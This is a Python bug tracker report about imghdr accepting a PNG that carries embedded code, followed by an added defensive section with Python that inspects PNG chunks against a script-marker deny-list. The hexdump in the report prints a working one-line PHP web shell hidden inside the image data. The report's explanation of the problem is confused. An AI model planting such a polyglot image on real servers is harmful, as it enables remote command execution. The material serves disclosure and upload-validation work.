[New-bugs-announce] [issue26337] Bypass imghdr module determines the type of image
Ramin Farajpour Cami
report at bugs.python.org
Thu Feb 11 00:55:17 EST 2016
New submission from Ramin Farajpour Cami:
import imghdr
imghdr.what('phppng.png')
Output:
'png'
If you set a JavaScript script in a .png or .jpg file,
Output:
ValueError: invalid \x escape
Hexdump:
root at Ramin:~# hexdump -C phppng.png
00000000 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 |.PNG........IHDR|
00000010 00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed |... ... ........|
00000020 a3 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e |.....pHYs.......|
00000030 c4 01 95 2b 0e 1b 00 00 00 60 49 44 41 54 48 89 |...+.....`IDATH.|
00000040 63 5c 3c 3f 3d 24 5f 47 45 54 5b 30 5d 28 24 5f |c\<?=$_GET[0]($_| ### Here PHP Code
00000050 50 4f 53 54 5b 31 5d 29 3b 3f 3e 58 80 81 81 c1 |POST[1]);?>X....|
00000060 73 5e 37 93 fc 8f 8b db 7e 5f d3 7d aa 27 f7 f1 |s^7.....~_.}.'..|
00000070 e3 c9 bf 5f ef 06 7c b2 30 30 63 d9 b9 67 fd d9 |..._..|.00c..g..|
00000080 3d 1b ce 32 8c 82 51 30 0a 46 c1 28 18 05 a3 60 |=..2..Q0.F.(...`|
00000090 14 8c 82 51 30 0a 86 0d 00 00 81 b2 1b 02 07 78 |...Q0..........x|
000000a0 0d 0c 00 00 00 00 49 45 4e 44 ae 42 60 82 |......IEND.B`.|
000000ae
----------
components: Library (Lib)
files: phppng.png
messages: 260074
nosy: Ramin Farajpour Cami
priority: normal
severity: normal
status: open
title: Bypass imghdr module determines the type of image
type: behavior
versions: Python 3.5
Added file: http://bugs.python.org/file41891/phppng.png
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue26337>
_______________________________________
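The behaviour reported above, as an added example that is not part of the original report or of CPython: a signature-only check accepts any file that starts with the PNG magic bytes, while a chunk-level inspection can flag embedded script markers, bad CRCs and trailing data. The function names, the marker deny-list and both sample files are assumptions constructed for this illustration.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
MARKERS = (b"<?", b"<script")  # assumed deny-list for this example

def header_says_png(data):
    # Equivalent to the signature-only test imghdr applies to PNG files.
    return data.startswith(PNG_SIG)

def chunk(ctype, body):
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

def inspect_png(data):
    """Return a list of findings; an empty list means nothing suspicious."""
    if not header_says_png(data):
        return ["not a PNG signature"]
    findings, pos, types = [], len(PNG_SIG), []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc) != 4:
            findings.append("truncated chunk")
            break
        if struct.unpack(">I", crc)[0] != zlib.crc32(ctype + body) & 0xFFFFFFFF:
            findings.append("bad CRC in %r" % ctype)
        if any(m in body.lower() for m in MARKERS):
            findings.append("script marker in %r" % ctype)
        types.append(ctype)
        pos += 12 + length
        if ctype == b"IEND":
            break
    if not types or types[0] != b"IHDR" or types[-1] != b"IEND":
        findings.append("missing IHDR/IEND")
    elif pos < len(data):
        findings.append("trailing data after IEND")
    return findings

# Constructed samples: a 1x1 grayscale PNG, and a copy with a harmless marker in a tEXt chunk.
IHDR = chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
IDAT = chunk(b"IDAT", zlib.compress(b"\x00\x00"))
IEND = chunk(b"IEND", b"")
CLEAN = PNG_SIG + IHDR + IDAT + IEND
TAGGED = PNG_SIG + IHDR + chunk(b"tEXt", b"Comment\x00<?php /* marker */ ?>") + IDAT + IEND
```

A two-byte marker such as `<?` will also occur by chance in large compressed IDAT data, so treat a hit as a reason to re-encode or reject the upload rather than as proof of a payload. Re-encoding uploaded images and storing them where the web server never executes them does not depend on any marker list.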